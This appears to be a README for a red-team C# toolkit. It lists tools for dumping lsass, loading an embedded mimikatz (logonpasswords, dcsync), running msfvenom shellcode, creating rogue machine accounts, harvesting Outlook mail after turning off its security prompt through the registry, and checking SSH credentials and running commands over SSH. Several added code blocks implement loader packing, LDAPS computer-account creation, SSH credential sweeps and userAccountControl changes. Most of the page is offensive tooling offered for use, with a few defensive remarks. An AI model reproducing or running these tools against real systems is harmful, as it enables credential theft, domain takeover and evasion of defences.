C# code from my blog.
Use CreateThread to run shellcode.
The shellcode is stored as Base64 (generated with msfvenom -p windows/x64/exec CMD=calc.exe EXITFUNC=thread -f csharp).
It reads ShellcodeBase64.txt and launches the shellcode. The payload is x64, so the loader must run as a 64-bit process.
Source code: https://github.com/GhostPack/SafetyKatz
Some functions of the source were removed; this version only dumps lsass.exe (a minidump written with MiniDumpWriteDump) to the current directory. It has to run from a high-integrity process (administrator or SYSTEM), because opening lsass needs SeDebugPrivilege.
Compile:
C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe DumpLsass.cs
or
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe DumpLsass.cs
Used to run sekurlsa::logonpasswords and sekurlsa::ekeys on a minidump file of lsass.exe.
All code is from https://github.com/GhostPack/SafetyKatz
I only modified a few lines so that it compiles with csc.exe.
E.g.
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe SafetyKatz.cs /unsafe
or
C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe SafetyKatz.cs /unsafe
Used to generate the KatzCompressed string in PELoaderofMimikatz.cs (the mimikatz PE, gzip-compressed and then Base64-encoded).
Compile:
C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe GzipandBase64.cs
or
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe GzipandBase64.cs
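The compress-and-encode step, and its reverse as a loader performs it, added as an example (the example's own code, not GzipandBase64.cs). The file names come from the command line and are the example's choice; the round-trip check at the end is there so a truncated or re-wrapped string fails here rather than inside a loader.

```csharp
using System;
using System.IO;
using System.IO.Compression;

// Added example (not GzipandBase64.cs): gzip a file and Base64-encode the result,
// which is the form an embedded "KatzCompressed" string takes, plus the reverse
// step a loader performs.
static class GzipBase64Example
{
    public static string Pack(byte[] raw)
    {
        using (MemoryStream ms = new MemoryStream())
        {
            // leaveOpen=true: the GZipStream must be closed to flush its footer
            // before ms.ToArray() is read, but ms itself has to stay usable.
            using (GZipStream gz = new GZipStream(ms, CompressionMode.Compress, true))
                gz.Write(raw, 0, raw.Length);
            return Convert.ToBase64String(ms.ToArray());
        }
    }

    public static byte[] Unpack(string packed)
    {
        byte[] compressed = Convert.FromBase64String(packed);
        using (MemoryStream input = new MemoryStream(compressed))
        using (GZipStream gz = new GZipStream(input, CompressionMode.Decompress))
        using (MemoryStream output = new MemoryStream())
        {
            // Manual copy loop: Stream.CopyTo only exists from .NET 4.0,
            // and the loaders on this page are meant to build on 3.5 as well.
            byte[] buf = new byte[64 * 1024];
            int n;
            while ((n = gz.Read(buf, 0, buf.Length)) > 0)
                output.Write(buf, 0, n);
            return output.ToArray();
        }
    }

    static bool SameBytes(byte[] a, byte[] b)
    {
        if (a.Length != b.Length) return false;
        for (int i = 0; i < a.Length; i++) if (a[i] != b[i]) return false;
        return true;
    }

    static void Main(string[] args)
    {
        if (args.Length != 2)
        {
            Console.WriteLine("usage: GzipBase64Example.exe <input exe> <output txt>");
            return;
        }
        byte[] raw = File.ReadAllBytes(args[0]);
        string packed = Pack(raw);
        File.WriteAllText(args[1], packed);

        // Round-trip before pasting the string into a loader.
        bool ok = SameBytes(raw, Unpack(packed));
        Console.WriteLine("{0} bytes -> {1} Base64 chars, round-trip {2}",
                          raw.Length, packed.Length, ok ? "OK" : "FAILED");
    }
}
```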
The source file is Casey Smith's PELoader.cs; the embedded mimikatz was version 2.0 alpha (x64) release "Kiwi en C" (Aug 17 2015 00:14:48).
I changed it to the newer version (mimikatz 2.1.1 (x64) built on Sep 25 2018 15:08:14).
The original source supports .NET 4.0 or later.
This code supports .NET 3.5 or later.
Compile:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe PELoaderofMimikatz.cs
or
C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe /unsafe PELoaderofMimikatz.cs
This is the dcsync mode extracted from mimikatz.
The source code embedded in KatzCompressed is https://github.com/3gstudent/test/blob/master/Mimkatz-dcsync.zip
You can use https://github.com/3gstudent/Homework-of-C-Sharp/blob/master/GzipandBase64.cs to generate the KatzCompressed string.
The original source supports .NET 4.0 or later.
This code supports .NET 3.5 or later.
Compile:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe DcsyncofMimikatz.cs
or
C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe /unsafe DcsyncofMimikatz.cs
Usage:
DcsyncofMimikatz.exe log "lsadump::dcsync /domain:test.com /all /csv" exit
DcsyncofMimikatz.exe log "lsadump::dcsync /domain:test.com /user:administrator /csv" exit
The account running it needs the replication rights on the domain (DS-Replication-Get-Changes and DS-Replication-Get-Changes-All), which Domain Admins have by default.
Reference: Casey Smith's PELoader.cs
The source file is Casey Smith's PELoader.cs; the embedded mimikatz was version 2.0 alpha (x64) release "Kiwi en C" (Aug 17 2015 00:14:48).
I changed it to the newer version (mimikatz 2.1.1 (x64) built on Sep 25 2018 15:08:14).
The original source supports .NET 4.0 or later.
This code supports .NET 3.5 or later.
This is the 32-bit version.
Compile:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /unsafe /platform:x86 SharpMimikatz_x86.cs
or
C:\Windows\Microsoft.NET\Framework\v3.5\csc.exe /unsafe /platform:x86 SharpMimikatz_x86.cs
Usage:
SharpMimikatz_x86.exe coffee exit
Reference: Casey Smith's PELoader.cs
The source file is Casey Smith's PELoader.cs; the embedded mimikatz was version 2.0 alpha (x64) release "Kiwi en C" (Aug 17 2015 00:14:48).
I changed it to the newer version (mimikatz 2.1.1 (x64) built on Sep 25 2018 15:08:14).
The original source supports .NET 4.0 or later.
This code supports .NET 3.5 or later.
This is the 64-bit version.
Compile:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /platform:x64 SharpMimikatz_x64.cs
or
C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe /unsafe /platform:x64 SharpMimikatz_x64.cs
Usage:
SharpMimikatz_x64.exe coffee exit
Used to generate SharpPELoader.cs.
Modified by 3gstudent
Reference: Casey Smith's PELoader.cs
Usage:
SharpPELoaderGenerater.exe <exe path>
E.g.
SharpPELoaderGenerater.exe mimikatz.exe
SharpPELoaderGenerater determines from the PE header whether the exe is 32-bit or 64-bit and then generates the corresponding code.
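The bitness decision a generator has to make, added as an example (not SharpPELoaderGenerater's code): walk the DOS header to the PE header and read IMAGE_FILE_HEADER.Machine together with the optional header Magic, cross-checking the two. The command-line layout is the example's own.

```csharp
using System;
using System.IO;

// Added example: decide from the PE headers whether an executable is 32-bit or
// 64-bit, i.e. whether the generated loader must be built with /platform:x86
// or /platform:x64.
static class PeBitness
{
    const ushort IMAGE_DOS_SIGNATURE = 0x5A4D;          // "MZ"
    const uint IMAGE_NT_SIGNATURE = 0x00004550;         // "PE\0\0"
    const ushort IMAGE_FILE_MACHINE_I386 = 0x014C;
    const ushort IMAGE_FILE_MACHINE_AMD64 = 0x8664;
    const ushort IMAGE_NT_OPTIONAL_HDR32_MAGIC = 0x10B;
    const ushort IMAGE_NT_OPTIONAL_HDR64_MAGIC = 0x20B;

    public static string Detect(string path)
    {
        using (BinaryReader br = new BinaryReader(File.OpenRead(path)))
        {
            if (br.ReadUInt16() != IMAGE_DOS_SIGNATURE)
                throw new InvalidDataException("not an MZ executable");

            br.BaseStream.Seek(0x3C, SeekOrigin.Begin);          // IMAGE_DOS_HEADER.e_lfanew
            int peOffset = br.ReadInt32();
            br.BaseStream.Seek(peOffset, SeekOrigin.Begin);
            if (br.ReadUInt32() != IMAGE_NT_SIGNATURE)
                throw new InvalidDataException("PE signature not found");

            ushort machine = br.ReadUInt16();                     // IMAGE_FILE_HEADER.Machine
            br.BaseStream.Seek(18, SeekOrigin.Current);           // rest of the 20-byte file header
            ushort magic = br.ReadUInt16();                       // IMAGE_OPTIONAL_HEADER.Magic

            // Cross-check both fields: a mismatch means a malformed or unusual image.
            if (machine == IMAGE_FILE_MACHINE_AMD64 && magic == IMAGE_NT_OPTIONAL_HDR64_MAGIC) return "x64";
            if (machine == IMAGE_FILE_MACHINE_I386 && magic == IMAGE_NT_OPTIONAL_HDR32_MAGIC) return "x86";
            throw new InvalidDataException(string.Format(
                "unsupported or inconsistent image: Machine=0x{0:X4} Magic=0x{1:X3}", machine, magic));
        }
    }

    static void Main(string[] args)
    {
        if (args.Length != 1)
        {
            Console.WriteLine("usage: PeBitness.exe <exe path>");
            return;
        }
        string arch = Detect(args[0]);
        Console.WriteLine("{0}: {1} -> compile the loader with /platform:{1}", args[0], arch);
    }
}
```

One caveat for managed input: a .NET "Any CPU" assembly reports I386/PE32 in these headers but runs as a 64-bit process on x64; for native executables like mimikatz the two header fields are authoritative.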
More details:
Reference: https://github.com/pkb1s/SharpAllowedToAct
This code is just part of SharpAllowedToAct.
It can be used to add a machine account (User: testNew, Password: 123456789).
By default any authenticated domain user may create up to 10 machine accounts (ms-DS-MachineAccountQuota), and the password (unicodePwd) is only accepted over an encrypted connection such as LDAPS.
This code can be compiled by csc.exe or Visual Studio.
Supports .NET 3.5 or later.
Compile:
C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe AddMachineAccountofDomain.cs /r:System.DirectoryServices.dll,System.DirectoryServices.Protocols.dll
or
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe AddMachineAccountofDomain.cs /r:System.DirectoryServices.dll,System.DirectoryServices.Protocols.dll
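Creating the computer object over LDAPS with System.DirectoryServices.Protocols, added as an example (it is not SharpAllowedToAct or AddMachineAccountofDomain.cs). The argument layout, the CN=Computers container, the SPN set and the accept-any-certificate callback are the example's own assumptions; compile with /r:System.DirectoryServices.Protocols.dll.

```csharp
using System;
using System.DirectoryServices.Protocols;
using System.Text;

// Added example: create a computer object over LDAPS. The DN layout, SPNs and
// argument order are this example's assumptions, not the original tool's.
class AddMachineAccountExample
{
    const int UF_WORKSTATION_TRUST_ACCOUNT = 0x1000;

    static void Main(string[] args)
    {
        if (args.Length != 4)
        {
            Console.WriteLine("usage: AddMachineAccountExample.exe <dc host> <domain DN> <machine name> <password>");
            Console.WriteLine("   eg: AddMachineAccountExample.exe dc01.test.com DC=test,DC=com testNew 123456789");
            return;
        }
        string dc = args[0], domainDn = args[1], name = args[2], password = args[3];
        string dnsDomain = domainDn.Replace("DC=", "").Replace(",", ".");   // DC=test,DC=com -> test.com

        // unicodePwd is only accepted over an encrypted connection, so bind on 636 with SSL.
        LdapDirectoryIdentifier id = new LdapDirectoryIdentifier(dc, 636, false, false);
        using (LdapConnection conn = new LdapConnection(id))
        {
            conn.SessionOptions.SecureSocketLayer = true;
            conn.SessionOptions.ProtocolVersion = 3;
            // Lab DCs usually have self-signed certificates; do not keep this in production tooling.
            conn.SessionOptions.VerifyServerCertificate = delegate { return true; };
            // Current user's domain credentials. Any authenticated user succeeds while
            // ms-DS-MachineAccountQuota (default 10) is not exhausted.
            conn.AuthType = AuthType.Negotiate;
            conn.Bind();

            string dn = string.Format("CN={0},CN=Computers,{1}", name, domainDn);
            AddRequest req = new AddRequest(dn, "computer");
            req.Attributes.Add(new DirectoryAttribute("sAMAccountName", name + "$"));
            req.Attributes.Add(new DirectoryAttribute("dNSHostName", name + "." + dnsDomain));
            req.Attributes.Add(new DirectoryAttribute("userAccountControl", UF_WORKSTATION_TRUST_ACCOUNT.ToString()));
            req.Attributes.Add(new DirectoryAttribute("servicePrincipalName",
                "HOST/" + name, "HOST/" + name + "." + dnsDomain,
                "RestrictedKrbHost/" + name, "RestrictedKrbHost/" + name + "." + dnsDomain));
            // AD expects the password as a UTF-16LE string wrapped in double quotes.
            req.Attributes.Add(new DirectoryAttribute("unicodePwd", Encoding.Unicode.GetBytes("\"" + password + "\"")));

            AddResponse resp = (AddResponse)conn.SendRequest(req);
            Console.WriteLine("{0}: {1} {2}", dn, resp.ResultCode, resp.ErrorMessage);
        }
    }
}
```

From the defensive side, the two settings this depends on are the ones to audit: set ms-DS-MachineAccountQuota to 0 if ordinary users have no business joining machines, and watch for event 4741 (computer account created) raised by non-admin accounts.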
Use the Outlook object model (MAPI through Microsoft.Office.Interop.Outlook) to manage Outlook.
This code can be compiled by csc.exe or Visual Studio.
Supports .NET 3.5 or later.
Compile:
C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe mapi_tool.cs /r:Microsoft.Office.Interop.Outlook.dll
or
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe mapi_tool.cs /r:Microsoft.Office.Interop.Outlook.dll
Usage:
mapi_tool.exe GetAllFolders
mapi_tool.exe GetConfig
mapi_tool.exe ListMail <folder>
mapi_tool.exe ListUnreadMail <folder>
Ex commands:
mapi_tool.exe GetConfigEx
mapi_tool.exe GetContactsEx
mapi_tool.exe GetGlobalAddressEx
mapi_tool.exe ListMailEx <folder>
mapi_tool.exe ListUnreadMailEx <folder>
mapi_tool.exe SaveAttachment <folder> <EntryID>
<folder>: Inbox/Drafts/SentItems/DeletedItems/Outlook/JunkEmail
Note:
When no antivirus software is active, or it is out of date, running an Ex command pops up an Outlook security prompt (the Object Model Guard).
You can turn the prompt off in the registry (x.0 is the Office version, e.g. 14.0 for Outlook 2010 and 15.0 for Outlook 2013):
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\x.0\Outlook\Security, DWORD ObjectModelGuard = 2
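A listing of unread mail in one of the default folders through the Outlook object model, added as an example (not mapi_tool.cs). The folder-name mapping and the argument layout are the example's own. Reading SenderEmailAddress is one of the address properties the Object Model Guard protects, so this is the line that triggers the prompt described in the note; Subject, ReceivedTime and attachment names do not. Compile with /r:Microsoft.Office.Interop.Outlook.dll.

```csharp
using System;
using Outlook = Microsoft.Office.Interop.Outlook;

// Added example: list unread mail in a default Outlook folder. The folder
// names accepted here are this example's mapping, not the original tool's.
class OutlookUnreadExample
{
    static Outlook.MAPIFolder Resolve(Outlook.NameSpace ns, string name)
    {
        switch (name.ToLowerInvariant())
        {
            case "inbox":        return ns.GetDefaultFolder(Outlook.OlDefaultFolders.olFolderInbox);
            case "drafts":       return ns.GetDefaultFolder(Outlook.OlDefaultFolders.olFolderDrafts);
            case "sentitems":    return ns.GetDefaultFolder(Outlook.OlDefaultFolders.olFolderSentMail);
            case "deleteditems": return ns.GetDefaultFolder(Outlook.OlDefaultFolders.olFolderDeletedItems);
            case "outbox":       return ns.GetDefaultFolder(Outlook.OlDefaultFolders.olFolderOutbox);
            case "junkemail":    return ns.GetDefaultFolder(Outlook.OlDefaultFolders.olFolderJunk);
            default: throw new ArgumentException("unknown folder: " + name);
        }
    }

    static void Main(string[] args)
    {
        string folderName = args.Length > 0 ? args[0] : "Inbox";
        Outlook.Application app = new Outlook.Application();   // attaches to the running Outlook, or starts it
        Outlook.NameSpace ns = app.GetNamespace("MAPI");
        Outlook.MAPIFolder folder = Resolve(ns, folderName);

        // Restrict() filters on the store instead of walking every item.
        Outlook.Items unread = folder.Items.Restrict("[Unread] = true");
        unread.Sort("[ReceivedTime]", true);
        Console.WriteLine("{0}: {1} unread of {2}", folder.Name, unread.Count, folder.Items.Count);

        foreach (object o in unread)
        {
            Outlook.MailItem mail = o as Outlook.MailItem;
            if (mail == null) continue;   // meeting requests, reports etc. are other item types

            // SenderEmailAddress is address data: this access is what the Object Model Guard prompts on.
            Console.WriteLine("{0:yyyy-MM-dd HH:mm}  {1}  {2}", mail.ReceivedTime, mail.SenderEmailAddress, mail.Subject);
            Console.WriteLine("    EntryID: " + mail.EntryID);
            foreach (Outlook.Attachment a in mail.Attachments)
                Console.WriteLine("    attachment: {0} ({1} bytes)", a.FileName, a.Size);
        }
    }
}
```

The EntryID printed for each message is the identifier a SaveAttachment-style command needs to address one item later.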
Use for Outlook 2010.
Use for Outlook 2013.
Used to translate Braille patterns (the Unicode Braille Patterns block) to ASCII characters.
Supported: 1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ),!/-.?;'$
This code can be compiled by csc.exe or Visual Studio.
Supports .NET 3.5 or later.
Compile:
C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe BrailleToASCII.cs
or
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe BrailleToASCII.cs
Used to scan a website's SSL/TLS certificate.
Reference: https://github.com/ryanries/SharpTLSScan
This code can be compiled by csc.exe or Visual Studio.
Supports .NET 3.5 or later.
Compile:
C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe SSLCertScan.cs
or
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe SSLCertScan.cs
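What such a scan looks like with SslStream, added as an example (not SSLCertScan.cs or SharpTLSScan): the validation callback records the platform's verdict but accepts the connection anyway, so a bad certificate can be inspected instead of aborting the scan. The host/port arguments and the findings at the end are the example's own.

```csharp
using System;
using System.Net.Security;
using System.Net.Sockets;
using System.Security.Cryptography.X509Certificates;

// Added example: connect with TLS, keep the certificate the server presented
// and report the details a scanner cares about.
class CertScanExample
{
    static void Main(string[] args)
    {
        if (args.Length < 1) { Console.WriteLine("usage: CertScanExample.exe <host> [port]"); return; }
        string host = args[0];
        int port = args.Length > 1 ? int.Parse(args[1]) : 443;

        X509Certificate2 leaf = null;
        X509ChainStatus[] chainStatus = new X509ChainStatus[0];
        SslPolicyErrors policyErrors = SslPolicyErrors.None;

        using (TcpClient tcp = new TcpClient(host, port))
        using (SslStream ssl = new SslStream(tcp.GetStream(), false,
            delegate(object sender, X509Certificate cert, X509Chain chain, SslPolicyErrors errors)
            {
                // Record the validator's verdict, then accept: a scanner wants
                // to inspect bad certificates, not abort on them.
                leaf = new X509Certificate2(cert);
                chainStatus = chain.ChainStatus;   // copy now; the chain is not ours to keep
                policyErrors = errors;
                return true;
            }))
        {
            ssl.AuthenticateAsClient(host);
            Console.WriteLine("Protocol     : {0}", ssl.SslProtocol);
            Console.WriteLine("Cipher       : {0} {1}-bit, hash {2}, key exchange {3}",
                ssl.CipherAlgorithm, ssl.CipherStrength, ssl.HashAlgorithm, ssl.KeyExchangeAlgorithm);
        }

        string keyAlg = leaf.PublicKey.Oid.FriendlyName;
        int keyBits = keyAlg == "RSA" ? leaf.PublicKey.Key.KeySize : 0;   // PublicKey.Key only works for RSA/DSA here
        Console.WriteLine("Subject      : {0}", leaf.Subject);
        Console.WriteLine("Issuer       : {0}", leaf.Issuer);
        Console.WriteLine("Serial       : {0}", leaf.SerialNumber);
        Console.WriteLine("Valid        : {0:u} -> {1:u}", leaf.NotBefore, leaf.NotAfter);
        Console.WriteLine("Signature    : {0}", leaf.SignatureAlgorithm.FriendlyName);
        Console.WriteLine("Public key   : {0} {1}", keyAlg, keyBits > 0 ? keyBits + "-bit" : "");
        Console.WriteLine("Thumbprint   : {0}", leaf.Thumbprint);
        foreach (X509Extension ext in leaf.Extensions)
            if (ext.Oid.Value == "2.5.29.17")   // subjectAltName
                Console.WriteLine("SAN          : {0}", ext.Format(false));

        // What the OS validator objected to, plus checks it does not phrase for you.
        Console.WriteLine("Policy errors: {0}", policyErrors);
        foreach (X509ChainStatus s in chainStatus)
            Console.WriteLine("  chain: {0} {1}", s.Status, s.StatusInformation.Trim());
        TimeSpan left = leaf.NotAfter - DateTime.Now;
        if (left < TimeSpan.Zero) Console.WriteLine("  FINDING: certificate expired {0:F0} days ago", -left.TotalDays);
        else if (left < TimeSpan.FromDays(30)) Console.WriteLine("  FINDING: certificate expires in {0:F0} days", left.TotalDays);
        if (keyAlg == "RSA" && keyBits < 2048) Console.WriteLine("  FINDING: RSA key shorter than 2048 bits");
        if (leaf.SignatureAlgorithm.FriendlyName.ToLowerInvariant().Contains("sha1"))
            Console.WriteLine("  FINDING: SHA-1 signature");
    }
}
```

When the target is given as an IP address the name check fails by design (RemoteCertificateNameMismatch shows up under policy errors); pass the DNS name to test what a browser would see.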
Used to check whether SSH credentials are valid (based on SSH.NET).
Supports password and private-key-file authentication.
Reference: https://github.com/sshnet/SSH.NET
Note:
You need to reference Renci.SshNet.dll.
You can download Renci.SshNet.dll from https://github.com/sshnet/SSH.NET/releases/download/2016.1.0/SSH.NET-2016.1.0-bin.zip
Compile:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe SharpSSHCheck_SSH.NET.cs /r:Renci.SshNet.dll
Usage:
SharpSSHCheck_SSH.NET.exe <SSH ServerIP> <SSH ServerPort> <mode> <user> <password>
<mode>:
- plaintext (the last argument is the password)
- keyfile (the last argument is the path to the private key file)
E.g.:
SharpSSHCheck_SSH.NET.exe 192.168.1.1 22 plaintext root toor
SharpSSHCheck_SSH.NET.exe 192.168.1.1 22 keyfile root id_rsa
Remote command execution via SSH (based on SSH.NET).
Supports password and private-key-file authentication.
Reference: https://github.com/sshnet/SSH.NET
Note:
You need to reference Renci.SshNet.dll.
You can download Renci.SshNet.dll from https://github.com/sshnet/SSH.NET/releases/download/2016.1.0/SSH.NET-2016.1.0-bin.zip
Compile:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe SharpSSHRunCmd_SSH.NET.cs /r:Renci.SshNet.dll
Usage:
SharpSSHRunCmd_SSH.NET.exe <SSH ServerIP> <SSH ServerPort> <mode> <user> <password> <cmd>
<mode>:
- plaintext (the last argument before <cmd> is the password)
- keyfile (the last argument before <cmd> is the path to the private key file)
If <cmd> is shell, you get an interactive shell.
E.g.:
SharpSSHRunCmd_SSH.NET.exe 192.168.1.1 22 plaintext root toor shell
SharpSSHRunCmd_SSH.NET.exe 192.168.1.1 22 keyfile root id_rsa ps
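The credential check and the single-command run, together in one block, added as an example that covers both SSH.NET tools above (it is neither SharpSSHCheck_SSH.NET.cs nor SharpSSHRunCmd_SSH.NET.cs). The argument layout copies the tools; the timeout value and the separation of "bad credential" from "could not connect" are the example's own choices. Compile with /r:Renci.SshNet.dll as above.

```csharp
using System;
using System.Net.Sockets;
using Renci.SshNet;
using Renci.SshNet.Common;

// Added example: validate one SSH credential with SSH.NET and, if accepted,
// run a single command. <host> <port> <plaintext|keyfile> <user> <password or key path> [cmd]
class SshCheckExample
{
    static ConnectionInfo Build(string host, int port, string mode, string user, string secret)
    {
        AuthenticationMethod auth;
        if (mode == "keyfile")
            // Unencrypted key; use PrivateKeyFile(path, passphrase) for an encrypted one.
            auth = new PrivateKeyAuthenticationMethod(user, new PrivateKeyFile(secret));
        else if (mode == "plaintext")
            auth = new PasswordAuthenticationMethod(user, secret);
        else
            throw new ArgumentException("mode must be plaintext or keyfile");

        ConnectionInfo ci = new ConnectionInfo(host, port, user, auth);
        ci.Timeout = TimeSpan.FromSeconds(10);   // do not hang on filtered ports
        return ci;
    }

    // Returns true when the credential is accepted. Connection-level failures
    // (refused, timeout, protocol) are reported separately from bad credentials,
    // so a sweep does not mistake an unreachable host for a wrong password.
    static bool Check(ConnectionInfo ci, string cmd)
    {
        using (SshClient client = new SshClient(ci))
        {
            try
            {
                client.Connect();
            }
            catch (SshAuthenticationException)
            {
                Console.WriteLine("[-] {0}@{1}: authentication failed", ci.Username, ci.Host);
                return false;
            }
            catch (SocketException ex)
            {
                Console.WriteLine("[!] {0}:{1}: {2}", ci.Host, ci.Port, ex.Message);
                return false;
            }
            catch (SshConnectionException ex)
            {
                Console.WriteLine("[!] {0}:{1}: {2}", ci.Host, ci.Port, ex.Message);
                return false;
            }

            Console.WriteLine("[+] {0}@{1}: valid credential", ci.Username, ci.Host);
            if (!string.IsNullOrEmpty(cmd))
            {
                SshCommand result = client.RunCommand(cmd);
                Console.Write(result.Result);
                if (result.ExitStatus != 0)
                    Console.Error.WriteLine("exit status {0}: {1}", result.ExitStatus, result.Error);
            }
            client.Disconnect();
            return true;
        }
    }

    static void Main(string[] args)
    {
        if (args.Length < 5)
        {
            Console.WriteLine("usage: SshCheckExample.exe <host> <port> <plaintext|keyfile> <user> <password or key path> [cmd]");
            return;
        }
        ConnectionInfo ci = Build(args[0], int.Parse(args[1]), args[2], args[3], args[4]);
        Check(ci, args.Length > 5 ? args[5] : null);
    }
}
```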
Used to export every user's mail attribute via LDAP.
Modified from https://github.com/Mr-Un1k0d3r/RedTeamCSharpScripts/blob/master/enumerateuser.cs
Compile:
C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe ListUserMailbyLDAP.cs /r:System.DirectoryServices.dll
or
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe ListUserMailbyLDAP.cs /r:System.DirectoryServices.dll
Usage:
ListUserMailbyLDAP <LDAP ServerIP> <user> <password>
E.g.:
ListUserMailbyLDAP.exe 192.168.1.1 test1 password1
Used to export all users whose password never expires (the DONT_EXPIRE_PASSWD bit, 0x10000, in userAccountControl) via LDAP.
Compile:
C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe List_passwordneverexpires_user_byLDAP.cs /r:System.DirectoryServices.dll
or
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe List_passwordneverexpires_user_byLDAP.cs /r:System.DirectoryServices.dll
Usage:
List_passwordneverexpires_user_byLDAP <LDAP ServerIP> <user> <password>
E.g.:
List_passwordneverexpires_user_byLDAP.exe 192.168.1.1 test1 password1
Used to set the password-never-expires flag on the selected user via LDAP. The binding account needs write access to the target's userAccountControl attribute.
Compile:
C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe Add_passwordneverexpires_user_byLDAP.cs /r:System.DirectoryServices.dll
or
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Add_passwordneverexpires_user_byLDAP.cs /r:System.DirectoryServices.dll
Usage:
Add_passwordneverexpires_user_byLDAP <LDAP ServerIP> <user> <password> <target user>
E.g.:
Add_passwordneverexpires_user_byLDAP.exe 192.168.1.1 administrator password1 test1
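Both sides of the password-never-expires tooling above, added as one example (not the page's List_/Add_ tools): a bitwise LDAP filter to find accounts with DONT_EXPIRE_PASSWD set, and a read-modify-write of userAccountControl to set it on one account. The argument layout copies the tools; the paged search, the pwdLastSet column and the filter escaping are the example's own additions. Compile with /r:System.DirectoryServices.dll.

```csharp
using System;
using System.DirectoryServices;

// Added example: list users with DONT_EXPIRE_PASSWD set, or set it on one user.
// Path form "LDAP://<ip>" and Secure (Negotiate) binding are this example's choices.
class PasswordNeverExpiresExample
{
    const int ADS_UF_DONT_EXPIRE_PASSWD = 0x10000;   // userAccountControl bit 16

    static void Main(string[] args)
    {
        if (args.Length < 3)
        {
            Console.WriteLine("usage: PasswordNeverExpiresExample.exe <LDAP ServerIP> <user> <password> [target sAMAccountName]");
            return;
        }
        // Explicit credentials; Secure = Negotiate (Kerberos/NTLM), not a simple bind in the clear.
        DirectoryEntry root = new DirectoryEntry("LDAP://" + args[0], args[1], args[2], AuthenticationTypes.Secure);
        if (args.Length == 3) ListNeverExpires(root);
        else SetNeverExpires(root, args[3]);
    }

    static void ListNeverExpires(DirectoryEntry root)
    {
        DirectorySearcher ds = new DirectorySearcher(root);
        // 1.2.840.113556.1.4.803 is LDAP_MATCHING_RULE_BIT_AND: match when the bit is set.
        ds.Filter = "(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=65536))";
        ds.PropertiesToLoad.Add("sAMAccountName");
        ds.PropertiesToLoad.Add("mail");
        ds.PropertiesToLoad.Add("pwdLastSet");
        ds.PageSize = 1000;   // paged search: gets past the DC's 1000-entry MaxPageSize
        int n = 0;
        foreach (SearchResult r in ds.FindAll())
        {
            long pwdLastSet = r.Properties.Contains("pwdLastSet") ? (long)r.Properties["pwdLastSet"][0] : 0;
            Console.WriteLine("{0}\t{1}\tpwdLastSet={2}", Attr(r, "sAMAccountName"), Attr(r, "mail"),
                pwdLastSet == 0 ? "never" : DateTime.FromFileTimeUtc(pwdLastSet).ToString("u"));
            n++;
        }
        Console.WriteLine("{0} account(s) with password never expires", n);
    }

    static void SetNeverExpires(DirectoryEntry root, string sam)
    {
        DirectorySearcher ds = new DirectorySearcher(root);
        ds.Filter = "(&(objectClass=user)(sAMAccountName=" + EscapeFilter(sam) + "))";
        SearchResult r = ds.FindOne();
        if (r == null) { Console.WriteLine("user not found: " + sam); return; }

        // Read-modify-write of the flags integer; the bind account needs write
        // access to userAccountControl on the target, an ACL worth auditing.
        DirectoryEntry target = r.GetDirectoryEntry();
        int uac = (int)target.Properties["userAccountControl"].Value;
        if ((uac & ADS_UF_DONT_EXPIRE_PASSWD) != 0) { Console.WriteLine(sam + ": already set"); return; }
        target.Properties["userAccountControl"].Value = uac | ADS_UF_DONT_EXPIRE_PASSWD;
        target.CommitChanges();
        Console.WriteLine("{0}: userAccountControl 0x{1:X} -> 0x{2:X}", sam, uac, uac | ADS_UF_DONT_EXPIRE_PASSWD);
    }

    static string Attr(SearchResult r, string name)
    {
        return r.Properties.Contains(name) ? r.Properties[name][0].ToString() : "";
    }

    // RFC 4515 escaping so an operator-supplied name cannot alter the filter.
    static string EscapeFilter(string s)
    {
        return s.Replace("\\", "\\5c").Replace("*", "\\2a").Replace("(", "\\28").Replace(")", "\\29").Replace("\0", "\\00");
    }
}
```

The same bitwise matching rule works for the other flags (0x2 ACCOUNTDISABLE, 0x400000 DONT_REQ_PREAUTH for AS-REP roasting), so the list half doubles as a general userAccountControl audit.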
From: https://github.com/FortyNorthSecurity/SqlClient
Used to query an MSSQL database.
Compile:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe SqlClient.cs
or
C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe SqlClient.cs
Used to export AD data via LDAP.
Compile:
C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe SharpADFindDemo.cs /r:System.DirectoryServices.dll
or
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe SharpADFindDemo.cs /r:System.DirectoryServices.dll
Usage:
SharpADFindDemo <LDAP ServerIP> <user> <password> <command>
command:
- user
- machine
- group
- ou
- username
- machinename
- groupname
- ouname
